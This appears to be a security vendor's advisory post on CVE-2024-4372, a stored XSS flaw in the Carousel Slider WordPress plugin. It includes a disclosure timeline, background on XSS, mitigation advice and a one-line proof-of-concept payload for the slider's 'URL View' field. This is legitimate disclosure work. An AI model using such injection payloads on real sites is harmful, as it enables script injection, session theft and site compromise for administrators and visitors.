In a recent security assessment, a critical vulnerability, CVE-2024-4372, was discovered within the Carousel Slider WordPress plugin. This flaw exposes an alarming risk of Stored Cross-Site Scripting (XSS), paving the way for unauthorized access and potential website compromise. (if an attacker has previously hijacked an administrator or editor account, he can plant a backdoor to regain access back).

Main info:

PluginCarousel Slider < 2.2.11
All Time914 982
Active installations40 000+
Publicly PublishedApril 30, 2024
Last UpdatedApril 30, 2024
ResearcherDmtirii Ignatyev
OWASP TOP-10A7: Cross-Site Scripting (XSS)
Plugin Security Certification by CleanTalk
Logo of the plugin


April 15, 2024Plugin testing and vulnerability detection in the Carousel Slider plugin have been completed
April 15, 2024I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
April 30, 2024Registered CVE-2024-4372

Discovery of the Vulnerability

During routine testing, security researchers uncovered a vulnerability within the Carousel Slider plugin. This flaw enables threat actors to execute malicious scripts, leading to potential account takeovers and compromise of website integrity.

Understanding of Stored XSS attack’s

Stored Cross-Site Scripting (XSS) vulnerabilities allow attackers to inject malicious scripts into web pages that are later viewed by other users. In WordPress, plugins often serve as entry points for such attacks due to their extensive functionalities.

Exploiting the Stored XSS Vulnerability

By leveraging the Carousel Slider plugin, attackers can embed malicious scripts, such as JavaScript, into sliders. These scripts execute when unsuspecting users interact with the compromised sliders, opening the door for various nefarious activities.


You should create new slider and put (1212″onmouseover=’alert(1)’) to “URL View” field


The risk posed by this vulnerability is significant. Attackers can exploit it to gain unauthorized access to website functionalities, steal sensitive data, or even distribute malware to unsuspecting visitors. In worst-case scenarios, it can lead to complete website takeover.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2024-4372 and similar vulnerabilities:

  • Immediately update the Carousel Slider plugin to the latest patched version.
  • Regularly monitor for security updates and apply them promptly.
  • Implement web application firewalls (WAFs) and security plugins to filter and block malicious requests.
  • Educate website administrators and users about the importance of safe browsing practices and awareness of potential security threats.

By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-4372, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2024-4372 – Carousel Slider – Stored XSS to JS backdoor creation – POC

Leave a Reply

Your email address will not be published. Required fields are marked *